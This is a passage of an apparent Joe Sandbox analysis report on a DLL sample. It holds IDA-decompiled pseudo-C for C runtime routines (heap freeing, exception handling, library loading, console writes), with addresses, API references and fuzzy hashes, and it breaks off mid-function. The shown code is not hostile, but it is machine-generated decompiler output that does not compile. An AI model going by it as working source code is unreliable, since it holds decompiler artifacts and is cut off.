			E6E9ED878(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x6e9f5f50;
				if(_t68 != 0x6e9f5f50) {
					E6E9EDC0E(_t68);
					_t36 = _a4;
				}
				E6E9EDC0E( *((intOrPtr*)(_t36 + 0x3c)));
				E6E9EDC0E( *((intOrPtr*)(_a4 + 0x30)));
				E6E9EDC0E( *((intOrPtr*)(_a4 + 0x34)));
				E6E9EDC0E( *((intOrPtr*)(_a4 + 0x38)));
				E6E9EDC0E( *((intOrPtr*)(_a4 + 0x28)));
				E6E9EDC0E( *((intOrPtr*)(_a4 + 0x2c)));
				E6E9EDC0E( *((intOrPtr*)(_a4 + 0x40)));
				E6E9EDC0E( *((intOrPtr*)(_a4 + 0x44)));
				E6E9EDC0E( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E6E9ED6A4(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E6E9ED70F(_t67, _t72, _t73, _t77);
			}

0x6e9ed878
0x6e9ed878
0x6e9ed878
0x6e9ed87d
0x6e9ed883
0x6e9ed885
0x6e9ed88b
0x6e9ed88e
0x6e9ed893
0x6e9ed896
0x6e9ed89a
0x6e9ed8a5
0x6e9ed8b0
0x6e9ed8bb
0x6e9ed8c6
0x6e9ed8d1
0x6e9ed8dc
0x6e9ed8e7
0x6e9ed8f5
0x6e9ed900
0x6e9ed908
0x6e9ed909
0x6e9ed90c
0x6e9ed912
0x6e9ed916
0x6e9ed91a
0x6e9ed91b
0x6e9ed925
0x6e9ed92b
0x6e9ed92c
0x6e9ed92f
0x6e9ed935
0x6e9ed939
0x6e9ed93d
0x6e9ed944

APIs

_free.LIBCMT ref: 6E9ED88E

Part of subcall function 6E9EDC0E: HeapFree.KERNEL32(00000000,00000000,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?), ref: 6E9EDC24
Part of subcall function 6E9EDC0E: GetLastError.KERNEL32(?,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?,?), ref: 6E9EDC36

_free.LIBCMT ref: 6E9ED89A
_free.LIBCMT ref: 6E9ED8A5
_free.LIBCMT ref: 6E9ED8B0
_free.LIBCMT ref: 6E9ED8BB
_free.LIBCMT ref: 6E9ED8C6
_free.LIBCMT ref: 6E9ED8D1
_free.LIBCMT ref: 6E9ED8DC
_free.LIBCMT ref: 6E9ED8E7
_free.LIBCMT ref: 6E9ED8F5

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 91c41a3a48ae9d509cd17a4d7fc2d925c0be61ebba3b4b0105370282c40565b2
Instruction ID: e3336625a2388467a3d9b77ff9fa68dbd612d5be499f2871ef8d2391a26da0d7
Opcode Fuzzy Hash: 91c41a3a48ae9d509cd17a4d7fc2d925c0be61ebba3b4b0105370282c40565b2
Instruction Fuzzy Hash: A5219776940108EFCB52DFE4C881DDE7BBDBF98244F0145A6E6199B660DB71EA44CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EA9D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6E9EA9D0(void* __ecx, signed int __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t68;
				signed int _t75;
				intOrPtr _t76;
				void* _t77;
				signed int _t78;
				intOrPtr _t80;
				signed int _t83;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr _t91;
				signed int _t94;
				char _t96;
				signed int _t102;
				signed int _t103;
				signed int _t110;
				void* _t111;
				intOrPtr _t112;
				signed int _t113;
				signed int _t115;
				void* _t116;
				void* _t117;
				void* _t123;

				_t107 = __edx;
				_t90 = _a4;
				_v5 = 0;
				_v16 = 1;
				 *_t90 = E6E9F4630(__ecx,  *_t90);
				_t91 = _a8;
				_t6 = _t91 + 0x10; // 0x11
				_t113 = _t6;
				_push(_t113);
				_v20 = _t113;
				_v12 =  *(_t91 + 8) ^  *0x6e9fc024;
				E6E9EA990(_t91, __edx, _t111, _t113,  *(_t91 + 8) ^  *0x6e9fc024);
				E6E9EBBFC(_a12);
				_t68 = _a4;
				_t117 = _t116 + 0x10;
				_t112 =  *((intOrPtr*)(_t91 + 0xc));
				if(( *(_t68 + 4) & 0x00000066) != 0) {
					__eflags = _t112 - 0xfffffffe;
					if(_t112 != 0xfffffffe) {
						_t107 = 0xfffffffe;
						E6E9EBDF0(_t91, 0xfffffffe, _t113, 0x6e9fc024);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t68;
					_v28 = _a12;
					 *((intOrPtr*)(_t91 - 4)) =  &_v32;
					if(_t112 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t94 = _v12;
							_t75 = _t112 + (_t112 + 2) * 2;
							_t91 =  *((intOrPtr*)(_t94 + _t75 * 4));
							_t76 = _t94 + _t75 * 4;
							_t95 =  *((intOrPtr*)(_t76 + 4));
							_v24 = _t76;
							if( *((intOrPtr*)(_t76 + 4)) == 0) {
								_t96 = _v5;
								goto L7;
							} else {
								_t107 = _t113;
								_t77 = E6E9EBD90(_t95, _t113);
								_t96 = 1;
								_v5 = 1;
								_t123 = _t77;
								if(_t123 < 0) {
									_v16 = 0;
									L13:
									_push(_t113);
									E6E9EA990(_t91, _t107, _t112, _t113, _v12);
									goto L14;
								} else {
									if(_t123 > 0) {
										_t78 = _a4;
										__eflags =  *_t78 - 0xe06d7363;
										if( *_t78 == 0xe06d7363) {
											__eflags =  *0x6e9f5474;
											if(__eflags != 0) {
												_t87 = E6E9F44D0(__eflags, 0x6e9f5474);
												_t117 = _t117 + 4;
												__eflags = _t87;
												if(_t87 != 0) {
													_t115 =  *0x6e9f5474; // 0x6e9eab2e
													 *0x6e9f51b8(_a4, 1);
													 *_t115();
													_t113 = _v20;
													_t117 = _t117 + 8;
												}
												_t78 = _a4;
											}
										}
										_t108 = _t78;
										E6E9EBDD0(_t78, _a8, _t78);
										_t80 = _a8;
										__eflags =  *((intOrPtr*)(_t80 + 0xc)) - _t112;
										if( *((intOrPtr*)(_t80 + 0xc)) != _t112) {
											_t108 = _t112;
											E6E9EBDF0(_t80, _t112, _t113, 0x6e9fc024);
											_t80 = _a8;
										}
										_push(_t113);
										 *((intOrPtr*)(_t80 + 0xc)) = _t91;
										E6E9EA990(_t91, _t108, _t112, _t113, _v12);
										E6E9EBDB0();
										asm("int3");
										_push(8);
										_push(0x6e9fa6a8);
										E6E9E9960(_t91, _t112, _t113);
										_t83 = _a4;
										__eflags = _t83;
										if(_t83 != 0) {
											__eflags =  *_t83 - 0xe06d7363;
											if( *_t83 == 0xe06d7363) {
												__eflags =  *((intOrPtr*)(_t83 + 0x10)) - 3;
												if( *((intOrPtr*)(_t83 + 0x10)) == 3) {
													__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930520;
													if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930520) {
														L29:
														_t102 =  *(_t83 + 0x1c);
														__eflags = _t102;
														if(_t102 != 0) {
															_t110 =  *(_t102 + 4);
															__eflags = _t110;
															if(_t110 == 0) {
																__eflags =  *_t102 & 0x00000010;
																if(( *_t102 & 0x00000010) != 0) {
																	_t83 =  *(_t83 + 0x18);
																	_t103 =  *_t83;
																	__eflags = _t103;
																	if(_t103 != 0) {
																		 *0x6e9f51b8(_t103);
																		_t83 =  *((intOrPtr*)( *((intOrPtr*)( *_t103 + 8))))();
																	}
																}
															} else {
																_t54 =  &_v8;
																 *_t54 = _v8 & 0x00000000;
																__eflags =  *_t54;
																_t83 = E6E9EABCF( *(_t83 + 0x18), _t110);
																_v8 = 0xfffffffe;
															}
														}
													} else {
														__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930521;
														if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930521) {
															goto L29;
														} else {
															__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930522;
															if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930522) {
																goto L29;
															}
														}
													}
												}
											}
										}
										 *[fs:0x0] = _v20;
										return _t83;
									} else {
										goto L7;
									}
								}
							}
							goto L37;
							L7:
							_t112 = _t91;
						} while (_t91 != 0xfffffffe);
						if(_t96 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L37:
			}

0x6e9ea9d0
0x6e9ea9d7
0x6e9ea9dc
0x6e9ea9e2
0x6e9ea9ee
0x6e9ea9f0
0x6e9ea9f6
0x6e9ea9f6
0x6e9ea9ff
0x6e9eaa01
0x6e9eaa04
0x6e9eaa07
0x6e9eaa0f
0x6e9eaa14
0x6e9eaa17
0x6e9eaa1a
0x6e9eaa21
0x6e9eaa7d
0x6e9eaa80
0x6e9eaa88
0x6e9eaa8f
0x00000000
0x6e9eaa8f
0x00000000
0x6e9eaa23
0x6e9eaa23
0x6e9eaa29
0x6e9eaa2f
0x6e9eaa35
0x6e9eaaa0
0x6e9eaaa9
0x6e9eaa37
0x6e9eaa37
0x6e9eaa37
0x6e9eaa3d
0x6e9eaa40
0x6e9eaa43
0x6e9eaa46
0x6e9eaa49
0x6e9eaa4e
0x6e9eaa64
0x00000000
0x6e9eaa50
0x6e9eaa50
0x6e9eaa52
0x6e9eaa57
0x6e9eaa59
0x6e9eaa5c
0x6e9eaa5e
0x6e9eaa74
0x6e9eaa94
0x6e9eaa94
0x6e9eaa98
0x00000000
0x6e9eaa60
0x6e9eaa60
0x6e9eaaaa
0x6e9eaaad
0x6e9eaab3
0x6e9eaab5
0x6e9eaabc
0x6e9eaac3
0x6e9eaac8
0x6e9eaacb
0x6e9eaacd
0x6e9eaacf
0x6e9eaadc
0x6e9eaae2
0x6e9eaae4
0x6e9eaae7
0x6e9eaae7
0x6e9eaaea
0x6e9eaaea
0x6e9eaabc
0x6e9eaaf0
0x6e9eaaf2
0x6e9eaaf7
0x6e9eaafa
0x6e9eaafd
0x6e9eab05
0x6e9eab09
0x6e9eab0e
0x6e9eab0e
0x6e9eab11
0x6e9eab15
0x6e9eab18
0x6e9eab28
0x6e9eab2d
0x6e9eab2e
0x6e9eab30
0x6e9eab35
0x6e9eab3a
0x6e9eab3d
0x6e9eab3f
0x6e9eab41
0x6e9eab47
0x6e9eab49
0x6e9eab4d
0x6e9eab4f
0x6e9eab56
0x6e9eab6a
0x6e9eab6a
0x6e9eab6d
0x6e9eab6f
0x6e9eab71
0x6e9eab74
0x6e9eab76
0x6e9eaba1
0x6e9eaba4
0x6e9eaba6
0x6e9eaba9
0x6e9eabab
0x6e9eabad
0x6e9eabb7
0x6e9eabbd
0x6e9eabbd
0x6e9eabad
0x6e9eab78
0x6e9eab78
0x6e9eab78
0x6e9eab78
0x6e9eab80
0x6e9eab85
0x6e9eab85
0x6e9eab76
0x6e9eab58
0x6e9eab58
0x6e9eab5f
0x00000000
0x6e9eab61
0x6e9eab61
0x6e9eab68
0x00000000
0x00000000
0x6e9eab68
0x6e9eab5f
0x6e9eab56
0x6e9eab4d
0x6e9eab47
0x6e9eabc2
0x6e9eabce
0x6e9eaa62
0x00000000
0x6e9eaa62
0x6e9eaa60
0x6e9eaa5e
0x00000000
0x6e9eaa67
0x6e9eaa67
0x6e9eaa69
0x6e9eaa70
0x00000000
0x6e9eaa72
0x00000000
0x6e9eaa70
0x6e9eaa35
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 6E9EAA07
___except_validate_context_record.LIBVCRUNTIME ref: 6E9EAA0F
_ValidateLocalCookies.LIBCMT ref: 6E9EAA98
__IsNonwritableInCurrentImage.LIBCMT ref: 6E9EAAC3
_ValidateLocalCookies.LIBCMT ref: 6E9EAB18

Strings

csm, xrefs: 6E9EAAAD

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: b6200cc9d2cdfc8b1e602c92f1a4893793c4a1b0a9e492fb3d485aec22a716ff
Instruction ID: 34952f5d1864a5f15eddfba35a8d617eb22b0908dcfee20b1cb9ac66c0a63214
Opcode Fuzzy Hash: b6200cc9d2cdfc8b1e602c92f1a4893793c4a1b0a9e492fb3d485aec22a716ff
Instruction Fuzzy Hash: 6D41B330A00309AFCF02CFA9C980ADE7BFAAF85318F008555EA156B765D771DA42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EDCF3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E9EDCF3(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x6e9fd560 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x6e9f6200 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E6E9ED618(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E6E9ED618(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x6e9edcfc
0x6e9edda6
0x6e9edd04
0x6e9edd06
0x6e9edd0d
0x6e9edd0f
0x6e9edd15
0x6e9edd22
0x6e9edd37
0x6e9edd3b
0x6e9edd8d
0x6e9edd8d
0x6e9edd92
0x6e9edd96
0x6e9edd99
0x6e9edd99
0x6e9edd9f
0x6e9edda1
0x6e9eddb6
0x6e9eddb1
0x6e9eddb5
0x6e9eddb5
0x6e9edda3
0x6e9edda3
0x00000000
0x6e9edda3
0x6e9edd3d
0x6e9edd46
0x6e9edd7d
0x6e9edd7d
0x6e9edd7f
0x6e9edd81
0x00000000
0x00000000
0x6e9edd89
0x00000000
0x6e9edd89
0x6e9edd50
0x6e9edd55
0x6e9edd5a
0x00000000
0x00000000
0x6e9edd64
0x6e9edd69
0x6e9edd6e
0x00000000
0x00000000
0x6e9edd73
0x6e9edd79
0x00000000
0x6e9edd79
0x6e9edd1a
0x00000000
0x00000000
0x00000000
0x6e9edd20
0x6e9eddaf
0x00000000

Strings

ext-ms-, xrefs: 6E9EDD5E
api-ms-, xrefs: 6E9EDD4A

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: ca010af1f97b6da24e20a4debaf1ce9859ef3f6f78de75df198fff31c1f9b9c6
Instruction ID: 457525da2d844ee9e9c43fb421d24fba73abeb36415b091f1d94c4bca980451e
Opcode Fuzzy Hash: ca010af1f97b6da24e20a4debaf1ce9859ef3f6f78de75df198fff31c1f9b9c6
Instruction Fuzzy Hash: 1321A171A45721ABDB538AB59C44B4A3B6C9FC2764F110550EA15ABF80D720ED40CEE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F19AC Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E9F19AC(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E6E9F1974(_t45, 7);
					E6E9F1974(_t45 + 0x1c, 7);
					E6E9F1974(_t45 + 0x38, 0xc);
					E6E9F1974(_t45 + 0x68, 0xc);
					E6E9F1974(_t45 + 0x98, 2);
					E6E9EDC0E( *((intOrPtr*)(_t45 + 0xa0)));
					E6E9EDC0E( *((intOrPtr*)(_t45 + 0xa4)));
					E6E9EDC0E( *((intOrPtr*)(_t45 + 0xa8)));
					E6E9F1974(_t45 + 0xb4, 7);
					E6E9F1974(_t45 + 0xd0, 7);
					E6E9F1974(_t45 + 0xec, 0xc);
					E6E9F1974(_t45 + 0x11c, 0xc);
					E6E9F1974(_t45 + 0x14c, 2);
					E6E9EDC0E( *((intOrPtr*)(_t45 + 0x154)));
					E6E9EDC0E( *((intOrPtr*)(_t45 + 0x158)));
					E6E9EDC0E( *((intOrPtr*)(_t45 + 0x15c)));
					return E6E9EDC0E( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x6e9f19b2
0x6e9f19b7
0x6e9f19c0
0x6e9f19cb
0x6e9f19d6
0x6e9f19e1
0x6e9f19ef
0x6e9f19fa
0x6e9f1a05
0x6e9f1a10
0x6e9f1a1e
0x6e9f1a2c
0x6e9f1a3d
0x6e9f1a4b
0x6e9f1a59
0x6e9f1a64
0x6e9f1a6f
0x6e9f1a7a
0x00000000
0x6e9f1a8a
0x6e9f1a8f

APIs

Part of subcall function 6E9F1974: _free.LIBCMT ref: 6E9F1999

_free.LIBCMT ref: 6E9F19FA

Part of subcall function 6E9EDC0E: HeapFree.KERNEL32(00000000,00000000,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?), ref: 6E9EDC24
Part of subcall function 6E9EDC0E: GetLastError.KERNEL32(?,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?,?), ref: 6E9EDC36

_free.LIBCMT ref: 6E9F1A05
_free.LIBCMT ref: 6E9F1A10
_free.LIBCMT ref: 6E9F1A64
_free.LIBCMT ref: 6E9F1A6F
_free.LIBCMT ref: 6E9F1A7A
_free.LIBCMT ref: 6E9F1A85

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b47540912a6668359d280ce4611d6576ad98f292eac8908dfa6c864ce8d72109
Instruction ID: c168b81bb5a8b06410f6969c40084f1bfc967045f21e6affc3b2ccb5acc2d7b1
Opcode Fuzzy Hash: b47540912a6668359d280ce4611d6576ad98f292eac8908dfa6c864ce8d72109
Instruction Fuzzy Hash: 8F119AB1580B08FBD621ABF1CC06FDB779CAFA2308F400D14A2A9A7152CB64E4498FC0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F0921 Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E6E9F0921(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				signed char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				signed int _t242;
				intOrPtr _t245;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				void* _t259;
				intOrPtr _t260;
				signed int _t261;
				signed char _t264;
				intOrPtr _t267;
				signed char* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				signed int _t278;
				intOrPtr _t279;
				signed int _t280;
				struct _OVERLAPPED* _t282;
				struct _OVERLAPPED* _t284;
				signed int _t285;
				void* _t286;
				void* _t287;

				_t170 =  *0x6e9fc024; // 0xd7674204
				_v8 = _t170 ^ _t285;
				_t172 = _a8;
				_t264 = _t172 >> 6;
				_t242 = (_t172 & 0x0000003f) * 0x38;
				_t269 = _a12;
				_v108 = _t269;
				_v80 = _t264;
				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0x6e9fd638 + _t264 * 4)) + 0x18));
				_v44 = _t242;
				_v96 = _a16 + _t269;
				_t178 = GetConsoleOutputCP();
				_t241 = 0;
				_v124 = _t178;
				E6E9EC407( &_v72, _t264, 0);
				_t273 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t245 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t245;
				_v104 = _t269;
				if(_t269 >= _v96) {
					L48:
					__eflags = _v60 - _t241;
				} else {
					while(1) {
						_t248 = _v44;
						_v51 =  *_t269;
						_v76 = _t241;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x6e9fd638 + _v80 * 4));
						_v48 = _t186;
						if(_t245 != 0xfde9) {
							goto L19;
						}
						_t211 = _t241;
						_t267 = _v48 + 0x2e + _t248;
						_v116 = _t267;
						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t264 = _v96 - _t269;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t269 & 0x000000ff) + 0x6e9fc760; // 0x0
							_t253 =  *_t72 + 1;
							_v48 = _t253;
							__eflags = _t253 - _t264;
							if(_t253 > _t264) {
								__eflags = _t264;
								if(_t264 <= 0) {
									goto L40;
								} else {
									_t278 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x6e9fd638 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
										_t241 =  &(_t241->Internal);
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									goto L39;
								}
							} else {
								_v144 = _t241;
								__eflags = _t253 - 4;
								_v140 = _t241;
								_v56 = _t269;
								_v40 = (_t253 == 4) + 1;
								_t220 = E6E9F169D( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
								_t287 = _t286 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t279 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0x6e9fc760)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t264) {
								__eflags = _t264;
								if(_t264 > 0) {
									_t280 = _t248;
									do {
										_t227 =  *((intOrPtr*)(_t241 + _t269));
										_t259 =  *((intOrPtr*)(0x6e9fd638 + _v80 * 4)) + _t280 + _t241;
										_t241 =  &(_t241->Internal);
										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
										_t280 = _v44;
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									L39:
									_t273 = _v88;
								}
								L40:
								_t277 = _t273 + _t264;
								__eflags = _t277;
								L41:
								__eflags = _v60;
								_v88 = _t277;
							} else {
								_t264 = _v40;
								_t282 = _t241;
								_t260 = _v116;
								do {
									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
									_t282 =  &(_t282->Internal);
								} while (_t282 < _t264);
								_t283 = _v48;
								_t261 = _v44;
								if(_v48 > 0) {
									E6E9E9DB0( &_v16 + _t264, _t269, _t283);
									_t261 = _v44;
									_t286 = _t286 + 0xc;
									_t264 = _v40;
								}
								_t272 = _v80;
								_t284 = _t241;
								do {
									 *( *((intOrPtr*)(0x6e9fd638 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
									_t284 =  &(_t284->Internal);
								} while (_t284 < _t264);
								_t269 = _v104;
								_t279 = _v48;
								_v120 =  &_v16;
								_v136 = _t241;
								_v132 = _t241;
								_v40 = (_v56 == 4) + 1;
								_t237 = E6E9F169D( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t287 = _t286 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t269 = _t269 - 1 + _t279;
									L27:
									_t269 =  &(_t269[1]);
									_v104 = _t269;
									_t193 = E6E9EFCA5(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
									_t286 = _t287 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t273 = _v84 - _v108 + _t269;
											_v88 = _t273;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t269 >= _v96) {
														goto L48;
													} else {
														_t245 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t273 = _t273 + 1;
															_v88 = _t273;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t269;
							_t188 = E6E9F02C6(_t264);
							_t249 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
								_push(1);
								_push(_t269);
								goto L26;
							} else {
								_t100 =  &(_t269[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t264 = _v80;
									_t251 = _v44;
									_t241 = _v33;
